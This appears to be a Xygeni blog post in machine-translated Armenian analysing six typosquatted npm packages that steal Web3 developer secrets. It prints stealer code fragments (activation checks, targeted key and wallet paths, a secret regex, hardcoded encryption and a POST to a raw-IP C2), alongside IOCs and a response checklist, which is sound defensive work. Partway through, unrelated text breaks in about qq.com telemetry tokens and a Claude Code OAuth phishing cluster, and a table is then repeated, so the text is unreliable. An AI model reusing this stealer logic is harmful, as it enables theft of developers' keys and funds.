EVMDeFi npm Typosquatting հարձակումը գողանում է մշակողի բանալիները

EVM/DeFi npm Typosquatting հարձակումը գողանում է մշակողի բանալիները

TL. DR

2026 թվականի մայիսի 6-ին, մեկ npm հրատարակիչ, namikazesarada010206, տարածել է վեց վնասակար փաթեթ, որոնք թիրախավորում են Ethereum, Solidity և DeFi մշակողների էկոհամակարգը։

Փաթեթները, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, եւ web3-utils-core, օգտագործվել են հավանական անուններ, որոնք նախատեսված էին Web3-ի հայտնի գործիքակազմի օժանդակ գրադարանների նմանվելու համար։

Բոլոր վեց փաթեթները պարունակում էին նույնը telemetry.js ֆայլ։ Ֆայլը կլաստերում նույնական էր բայթերով՝ SHA-256-ով։

ՊԱԳ - 256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Վնասակար ծրագիրը չի գործարկվում տեղադրման ժամանակ։ Չկա preinstall or postinstall որսալ։ Փոխարենը, այն ակտիվանում է, երբ փաթեթը ներմուծվում է require().

Այդ մանրուքը կարևոր է։

Իմպլանտը սպասում է, մինչև մշակողը իրականում օգտագործի փաթեթը։ Այնուհետև այն ստուգում է, թե արդյոք աշխատանքային կայանը նման է իրական Ethereum / Solidity մշակման միջավայրի։ Այն փնտրում է Alchemy կամ Infura բանալիներ, մասնավոր բանալիներ, mnemonics, deployer բանալիներ կամ տեղական Foundry գրացուցակ։

Եթե ​​հոսթը համընկնում է, գողացողը հավաքում է SSH մասնավոր բանալիները, Foundry / Geth / Brownie դրամապանակների բանալիների պահոցները, .env* ֆայլերը և զգայուն միջավայրի փոփոխականները: Այն կոդավորում է փաթեթը AES-256-GCM-ով՝ օգտագործելով կոշտ կոդավորված գաղտնաբառ և արտանետում այն ​​հում IPv4 C2 վերջնակետ՝ TLS ստուգումն անջատված վիճակում:

Xygeni-ի վնասակար ծրագրերի վաղ նախազգուշացման (MEW) համակարգը հաստատել է, որ բոլոր վեց փաթեթները վնասակար են։ npm գրանցամատյանի հեռացման մասին հաղորդագրությունների փաթեթը սպասման մեջ է։

Կլաստեր. Վեց փաթեթ, մեկ հրատարակիչ

Հրատարակչի հաշիվը namikazesarada010206 կապված էր չհաստատված Gmail հասցեի հետ namikazesarada010206@gmail.com.

Արշավը հայտնվեց որպես մեկօրյա հրապարակման պոռթկում 2026 թվականի մայիսի 6-ին։ Բոլոր վեց փաթեթները տարբերակված էին որպես 1.0.0, չուներ զրոյական կատարողական կախվածություններ և ուղարկում էր միայն երեք ֆայլ՝

package.json index.js telemetry.js

Նրանք նաև հայտարարեցին նույն աղբյուրի պահոցը՝

https://github.com/harunosakura030303-maker/evmchain-config

Առաջին երեք փաթեթները հայտնաբերվել են MEW սկաներների կողմից առաջին հրապարակման ժամանակ։ Մնացած երեքը հարկադիր նշագրվել են հրատարակչի npm պրոֆիլի վերլուծաբանների կողմից վերանայումից հետո։ Մի անգամ նույն բայթը նույնական էր telemetry.js հաստատվել է ամբողջ կլաստերում, դրանք փակվել են որպես վնասակար՝ հետևողականության շնորհիվ։

Փաթեթ տարբերակ npm Հրապարակված է MEW տոմս Դատավճիռ
վիեմ-միջուկ 1.0.0 2026-05-06 01:38:44Z #51049 Ոխակալ
viem-utils-core 1.0.0 2026-05-06 #51050 Ոխակալ
hardhat-core-utils 1.0.0 2026-05-06 #51051 Ոխակալ
evm-utils 1.0.0 2026-05-06 #51069 Չարամիտ, հետևողականությամբ
ձուլարանային օգտակար ծառայություններ 1.0.0 2026-05-06 #51071 Չարամիտ, հետևողականությամբ
web3-utils-core 1.0.0 2026-05-06 #51070 Չարամիտ, հետևողականությամբ

Անվանակոչման ռազմավարությունը պարզ է, բայց արդյունավետ։

Այս փաթեթները չեն ընդօրինակում ճշգրիտ վերևում գտնվող անունները։ Դրա փոխարեն նրանք օգտագործում են հավանական «օգտակար» վերջածանցներ, ինչպիսիք են՝ -core, -utils, եւ -utils-coreԴա դրանք դարձնում է ուղեկցող գրադարանների նման, որոնք մշակողը կարող է ակնկալել տեսնել Web3 գործիքակազմի նման։

Վնասակար փաթեթ Լեգիտիմ թիրախ
վիեմ-միջուկ viem, Ethereum TypeScript-ի հայտնի հաճախորդ
viem-utils-core վիեմ
hardhat-core-utils hardhat, Solidity-ի մշակման հիմնական միջավայր
evm-utils Ընդհանուր EVM գործիքավորման անվանատարածք
ձուլարանային օգտակար ծառայություններ ձուլարան, Solidity գործիքաշար
web3-utils-core web3-utils, Web3.js օգնականներ

Սա «լրացուցիչ փաթեթի» օրինաչափությունն է. ոչ թե «ես իրական փաթեթն եմ», այլ «ես իրական փաթեթի շուրջ ողջամիտ օգնականի տեսք ունեմ»։

Արագ շարժվող DeFi մշակողների համար դա բավարար է ռիսկ ստեղծելու համար։

Ի՞նչ է պատահում, երբ փաթեթը ներմուծվում է

Հարձակման շղթան փոքր է, միտումնավոր և կենտրոնացած է կրիպտոմշակման միջավայրերի վրա։

Տեղադրման կեռիկ չկա։ Դրա փոխարեն, յուրաքանչյուր փաթեթ ներառում է index.js որը արտահանում է stub ֆունկցիոնալությունը, ապա բեռնում է վնասակար հեռաչափման մոդուլը։

require('./telemetry').init();

Սա նշանակում է, որ վնասակար ծրագիրը ակտիվանում է առաջին ներմուծման ժամանակ։

Դա գործառնական առումով օգտակար է հարձակվողի համար: Շատ սկաներներ և sandbox-եր կենտրոնանում են տեղադրման ժամանակի վարքագծի վրա: Այս փաթեթը սպասում է մինչև այն իրականում օգտագործվի մշակողի, կառուցման սկրիպտի, թեստավորման հավաքածուի կամ գործարկման ուղու կողմից:

Ակտիվացման դարպաս. Գործարկել միայն իրական Web3 մշակողների աշխատանքային կայաններում

Իմպլանտի ամենակարևոր մասը ակտիվացման դարպասն է։

Վնասակար ծրագիրը ստուգում է Ethereum / Solidity մշակողների մեքենաների վրա սովորաբար հանդիպող միջավայրի փոփոխականները.

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Այն նաև ստուգում է, թե արդյոք Foundry-ն տեղադրված է թվում։

fs.existsSync(path.join(os.homedir(), '.foundry'))

Եթե ​​պայմաններից ոչ մեկը ճիշտ չէ, ֆունկցիան վերադարձնում է և ոչինչ չի անում։

Դա փաթեթն ավելի անաղմուկ է դարձնում ընդհանուր վերլուծության միջավայրերում: Foundry, Alchemy բանալիներ, Infura բանալիներ, մասնավոր բանալիներ կամ mnemonics-ից զուրկ ավազարկղը կարող է անվնաս թվալ:

Համապատասխան հոսթի վրա վնասակար ծրագիրը սպասում է 60-ից 90 վայրկյան՝ հավաքվելուց առաջ։

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Հետաձգումը նվազեցնում է ներմուծման և արտահոսքի միջև ակնհայտ կապը։ .unref() Կանչը նաև թույլ է տալիս հոսթ պրոցեսին սովորականի պես դուրս գալ, եթե փաթեթը ներմուծվել է կարճատև սկրիպտով։

Սա աղմկոտ «ջարդիր ու գողացիր» վարքագիծ չէ։ Սա նպատակային գողացող ծրագիր է, որը նախատեսված է աշխատանքը կանխելու համար, եթե մշակողի միջավայրը արժանի չէ գողանալու։

Ինչ է հավաքում գողը

Ակտիվացման դարպասն անցնելուց հետո վնասակար ծրագիրը հավաքվում է Web3 մշակման համար ամենակարևոր աղբյուրներից՝ մասնավոր բանալիներ, դրամապանակների բանալիների պահոցներ, տեղակայման հավատարմագրեր, ամպային գաղտնիքներ, npm տոկեններ և տեղական նախագծի կոնֆիգուրացիա։

Աղբյուր Ինչ է հավաքվում
process.env Ցանկացած փոփոխական, որը համապատասխանում է /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i-ին
~/.ssh/* PRIVATE KEY կամ BEGIN OPENSSH պարունակող ֆայլեր, ներառյալ ֆայլի ամբողջական բովանդակությունը
~/.foundry/keystores/* Foundry դրամապանակի բանալիների պահեստի ֆայլեր
~/.ethereum/keystore/* Geth դրամապանակի բանալիների պահեստի ֆայլեր
~/.brownie/accounts/* Brownie դրամապանակի բանալիների պահեստի ֆայլեր
${cwd}/.env Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.local Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.production Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.development Ֆայլի ամբողջական բովանդակությունը
os.hostname() Հոսթի մետատվյալներ
crypto.randomUUID() Զոհի/սեսիայի նույնականացուցիչ
Date.now () Հավաքածուի ժամանակային դրոշմանիշ
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA տոկեններն են՝

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Մենք չկարողացանք հաստատել, թե արդյոք հեռաչափումը օպերատորի սեփական վերլուծությունն էր, թե՞ առանձին մոնետիզացված ալիք։ ATTA տոկենները մեր կողմից ուսումնասիրված երկու նմուշներում էլ նույնն են։

Կլաստեր B: Հեյբայ

claude.hk OAuth Ֆիշինգ + ANTHROPIC_BASE_URL Հափշտակում

Ապրիլի 1-ի նմուշը քարոզարշավի ավելի կոպիտ, վաղ թևն է։

heibai:2.1.88-claude.hk-4 հրատարակել է wuguoqiangvip28, հաշիվ, որը ստեղծվել է 2025 թվականի հունիսի 7-ին։ Փաթեթը հստակորեն տարբերակվել է օրինականի դեմ։ 2.1.88 Մարդաբանական արտանետում։

Այն չի ազդում CA-cert MITM-ի վրա։ Դրա փոխարեն այն ստում է օգտատիրոջը OAuth վերջնակետի վերաբերյալ։

Արտահոսած Claude Code աղբյուրի չարամիտ լրացումները ներառում են.

Աղբյուր Ինչ է հավաքվում
process.env Ցանկացած փոփոխական, որը համապատասխանում է /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i-ին
~/.ssh/* PRIVATE KEY կամ BEGIN OPENSSH պարունակող ֆայլեր, ներառյալ ֆայլի ամբողջական բովանդակությունը
~/.foundry/keystores/* Foundry դրամապանակի բանալիների պահեստի ֆայլեր
~/.ethereum/keystore/* Geth դրամապանակի բանալիների պահեստի ֆայլեր
~/.brownie/accounts/* Brownie դրամապանակի բանալիների պահեստի ֆայլեր
${cwd}/.env Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.local Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.production Ֆայլի ամբողջական բովանդակությունը
${cwd}/.env.development Ֆայլի ամբողջական բովանդակությունը
os.hostname() Հոսթի մետատվյալներ
crypto.randomUUID() Զոհի/սեսիայի նույնականացուցիչ
Date.now () Հավաքածուի ժամանակային դրոշմանիշ

Նպատակային ցանկը խիստ կոնկրետ է։ Սա բրաուզերներից ընդհանուր գողություն կամ լայնածավալ տվյալների հավաքագրում չէ։ Այն նախատեսված է Ethereum հավելվածներ կառուցող, փորձարկող, տեղակայող կամ շահագործող մշակողների համար։

Հատկապես կարևոր է Foundry, Geth և Brownie բանալիների պահոցների ներառումը: Այս ֆայլերը կարող են ներկայացնել դրամապանակներին կամ տեղակայման ինքնություններին անմիջական մուտք: Եթե հարձակվողը կարողանա դրանք զուգակցել գաղտնաբառերի, հիշողության քարտերի կամ միջավայրի գաղտնիքների հետ, նրանք կարող են տեղափոխել միջոցներ, կեղծել տեղակայողները կամ վտանգել խելացի պայմանագրերի գործողությունները:

Գաղտնագրումը արտաքսումից առաջ

Վնասակար ծրագիրը կոդավորում է հավաքված տվյալները՝ դրանք ուղարկելուց առաջ։

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Կոշտ կոդավորված գաղտնաբառը հետևյալն է.

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Վերջնական բեռնվածությունը փաթեթավորված է որպես JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Ծածկագրումն ինքնին վնասակար ծրագիրը չի դարձնում ավելի առաջադեմ։ Այնուամենայնիվ, այն դժվարացնում է ցանցի ստուգումը։ Ելքը հետևող պաշտպանը կտեսնի JSON ֆայլ, բայց ոչ գողացված բանալիները, դրամապանակի ֆայլերը կամ... .env բովանդակություն՝ առանց կոշտ կոդավորված գաղտնաբառի և վերծանման տրամաբանության։

Արտահոսք դեպի Raw IPv4 C2

Արտազատման ուղին կոշտ կոդավորված է.

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Վնասակար ծրագիրը տվյալներ է ուղարկում հետևյալ հասցեներով՝

https://76.13.37.80:8443/api/v1/telemetry

Երկու մանրամասնություն առանձնանում է։

Նախ, C2-ը հում IPv4 հասցե է, այլ ոչ թե դոմեյն։ Դա վերացնում է դոմեյնի գրանցման անհրաժեշտությունը և խուսափում է որոշ դոմեյնային հայտնաբերումներից։

Երկրորդ, TLS ստուգումը անջատված է հետևյալի հետ՝

rejectUnauthorized: false

Դա թույլ է տալիս վնասակար ծրագրին ընդունել ցանկացած վկայական, այդ թվում՝ ինքնաստորագրված վկայականները։ Այլ կերպ ասած, հարձակվողը ստանում է կոդավորված փոխանցում՝ առանց վավեր հանրային վկայականի անհրաժեշտության։

Կրկնակի փորձի տրամաբանություն և պահեստային հոսթ չկա։ Սխալները աննկատ ընկալվում են։ Սա փաթեթը լռեցնում է, եթե C2-ը անջատված է կամ անհասանելի։

Ինչու է կարևոր այս քարոզարշավը

Մշակողների համար նախատեսված npm վնասակար փաթեթների մեծ մասը հետապնդում է լայն մուտքային տվյալներ՝ npm տոկեններ, AWS բանալիներ, GitHub տոկեններ կամ .npmrc ֆայլեր.

Այս արշավը նեղացնում է թիրախը։

Այն փնտրում է նշաններ, որոնք վկայում են, որ մեքենան պատկանում է Ethereum կամ Solidity մշակողի։ Այնուհետև այն վերցնում է հենց այն ակտիվները, որոնք կարևոր են այդ միջավայրում՝ դրամապանակների բանալիների պահոցներ, մասնավոր բանալիներ, հիշողության քարտեր, տեղակայողի բանալիներ, .env ֆայլեր և SSH բանալիներ։

Դա արշավն ավելի վտանգավոր է դարձնում Web3 թիմերի համար, քան ընդհանուր npm գողացողը։

Հաջող վարակը կարող է բացահայտել.

  • Տեղակայման դրամապանակները
  • Խելացի պայմանագրերի ադմինիստրատորի բանալիներ
  • RPC մատակարարի բանալիներ
  • Ամպային տեղակայման վկայագրեր
  • npm հրատարակչական տոկեններ
  • SSH մուտք դեպի մշակողի կամ կառուցողի ենթակառուցվածքներ
  • Նախագծի գաղտնիքները պահվում են .env Ֆայլեր
  • Դրամապանակի բանալիների պահեստներ Foundry-ի, Geth-ի կամ Brownie-ի համար

Փաթեթների անունները նաև ցույց են տալիս հստակ սոցիալական ինժեներիա։ Դրանք ուղղված են Web3 մշակողների էկոհամակարգին՝ ծանոթ գործիքների անուններով։ viem, hardhat, foundry, evm, եւ web3.

Գործող անձը կարիք չունի վտանգելու իրական նախագծերը։ Նրանց միայն մշակող է պետք, որը կտեղադրի այն, ինչը թվում է ողջամիտ ուղեկցող փաթեթ։

Կոտրման և հայտնաբերման ցուցիչներ

Փաթեթներ և հրատարակիչ
Դաշտ Արժեք
npm հրատարակիչ նամիկազեսարադա010206
Հրատարակչի էլ. փոստը namikazesarada010206@gmail.com
Էլ․ հասցեն հաստատված է Ոչ
SCM ստուգված Ոչ
Հեղինակության գնահատական 1.0
Փաթեթներ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
Versions Բոլոր 1.0.0
Աղբյուրի պահոց https://github.com/harunosakura030303-maker/evmchain-config
Հաստատված չարամիտ Բոլոր վեց փաթեթները
Ցանց
Տիպ Արժեք
C2 վերջնակետ https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 միացք 8443 / ճ.գ
TLS-ի վարքագիծը մերժելՉարտոնված՝ կեղծ
Օգտակար բեռնվածության սխեմա {"v":2,"iv": «դ» "տ": }
Ֆայլեր և հեշեր
Տիպ Արժեք
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Փաթեթի դասավորությունը package.json, index.js, telemetry.js
Ֆայլերի քանակը 3
Մոտավոր ընդհանուր չափը 3.4 KB

Ակտիվացման ազդանշաններ

Վնասակար ծրագիրը ստուգում է հետևյալ միջավայրի փոփոխականները՝

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Այն նաև ստուգում է.

~/.foundry/

Նպատակային հոսթի ուղիներ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Հավաքածուի ռեգեքս

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Հայտնաբերման նշումներ

Մի քանի կանոններ են թույլ տալիս ֆիքսել այս արշավը՝ առանց լիարժեք վարքային վերլուծության անհրաժեշտության։

Նախ, սկանավորեք lockfiles-ը վեց վնասակար փաթեթների անունների համար՝

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Ցանկացած համընկնում package-lock.json, yarn.lock, pnpm-lock.yamlԿամ node_modules Պատմությունը պետք է դիտարկել որպես լուրջ իրադարձություն։

Երկրորդ, վերահսկեք Node.js գործընթացները, որոնք կարդում են դրամապանակի բանալիների պահեստի ուղիները.

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Սա հազվադեպ է օրինական վարքագիծ համարվում որպես օգնական կախվածություն ներմուծված փաթեթի համար։ Այն հատկապես կասկածելի է, երբ դրան հաջորդում է ելքային ցանցային ակտիվություն։

Երրորդ՝ արգելափակել կամ զգուշացնել HTTPS կապերի դեպքում՝

76.13.37.80:8443

Հատկապես, երբ հարցման ուղին հետևյալն է.

/api/v1/telemetry

Չորրորդ, որոնեք npm փաթեթներ, որոնք համատեղում են այս հատկանիշները.

  • Նոր կամ ցածր հեղինակություն ունեցող հրատարակիչ
  • Չհաստատված Gmail հաշիվ
  • Web3-ին հարակից փաթեթի անունը
  • Առկա չէ նշանակալից պահոցի պատմություն
  • Փոքր փաթեթի դասավորություն
  • index.js որը բեռնում է հեռաչափման կամ օժանդակ ֆայլ
  • Գործարկման ժամանակի կախվածություններ չկան
  • Զգայուն միջավայրի փոփոխականների հավաքածու
  • Դրամապանակի բանալիների պահեստ մուտք

Այս ձևանմուշն ավելի օգտակար է, քան մեկ IOC, քանի որ հաջորդ փաթեթը կարող է փոխել IP հասցեն, բայց պահպանել նույն թիրախավորման տրամաբանությունը։

Փոխզիջման արձագանքի ստուգաթերթիկ

Եթե ​​մշակողը օգտագործել է վեց փաթեթներից մեկը, և նրա միջավայրը համապատասխանում է ակտիվացման դարպասին, աշխատանքային կայանը համարեք խախտված։

Դա ներառում է Foundry տեղադրված, Alchemy կամ Infura միջավայրում գտնվող բանալիներ, մասնավոր բանալիներ, mnemonic կամ deployer բանալիներ ունեցող մեքենաները։

Առաջարկվող պատասխան՝

  • Անջատեք հոսթը ցանցից։
  • Պահպանում node_modules, կողպված ֆայլեր, shell-ի պատմություն և դատաբժշկական փորձաքննության համար համապատասխան գրանցամատյաններ։
  • Պտտեք բոլոր SSH ստեղների զույգերը ներքևում ~/.ssh/.
  • Փոխեք դրամապանակի բանալիները ստորև նշված յուրաքանչյուր բանալիների պահեստի համար ~/.foundry, ~/.ethereum, եւ ~/.brownie.
  • Տեղափոխեք միջոցները նոր դրամապանակներին։
  • Պտտեք պահված յուրաքանչյուր գաղտնիքը .env* ֆայլեր այն պահոցներում, որոնցում աշխատել է մշակողը։
  • Պտտեք հավաքածուի regex-ին համապատասխանող միջավայրի գաղտնիքները, ներառյալ AWS բանալիները, npm տոկենները, տեղակայման տոկենները, API բանալիները, մասնավոր բանալիները, սերմերը և հիշողության կոդը։
  • Աուդիտի ամպային, npm, GitHub, RPC մատակարար և բլոկչեյնի ակտիվություն փաթեթի առաջին տեղադրումից ի վեր։
  • Վերօգտագործելուց առաջ վերստեղծեք աշխատանքային կայանի պատկերը։

Ինչը պետք է վերցնեն պաշտպանները

Այս արշավը ցույց է տալիս, թե ինչպես է npm typosquatting-ը զարգանում բարձրարժեք մշակողների էկոհամակարգերի շուրջ։

Գործող դերասանին համառություն պետք չէր։ Նրանց պետք չէր խեղաթյուրում։ Նրանց նույնիսկ տեղադրման ժամանակ կատարողական պետք չէր։

Փոխարենը, նրանք հույսը դրեցին երեք բանի վրա.

  • Հավանական Web3 փաթեթների անուններ
  • Ակտիվացում միայն իրական կրիպտո մշակման մեքենաների վրա
  • Ethereum մշակողների համար ամենակարևոր ֆայլերի և գաղտնիքների ուղղակի գողություն

Դա արշավը հեշտացնում է լայն սկանավորման ժամանակ անտեսանելի դարձնելը և վտանգավոր է դարձնում, երբ այն հայտնվում է ճիշտ միջավայրում։

Web3 թիմերի համար դասը պարզ է՝ կախվածությունների անունները դիտարկեք որպես ձեր սպառնալիքի մոդելի մաս: Անվնաս օգնականի տեսք ունեցող փաթեթը դեռ կարող է դառնալ դրամապանակի կոտրման ամենակարճ ճանապարհը:

Հաղորդվել է npm գրանցամատյանին։ Մենք կթարմացնենք այս գրառումը, երբ հրատարակչի հաշիվը և փաթեթները հեռացվեն։

sca-tools-software-composition-analysis-tools
Առաջնահերթություն տվեք, շտկեք և պաշտպանեք ձեր ծրագրային ռիսկերը
Ստացեք ձեր անվճար հաշիվը։
Ոչ մի վարկային քարտ չի պահանջվում:

Ապահովեք ձեր ծրագրային ապահովման մշակումը և մատակարարումը

Xygeni Product Suite-ի հետ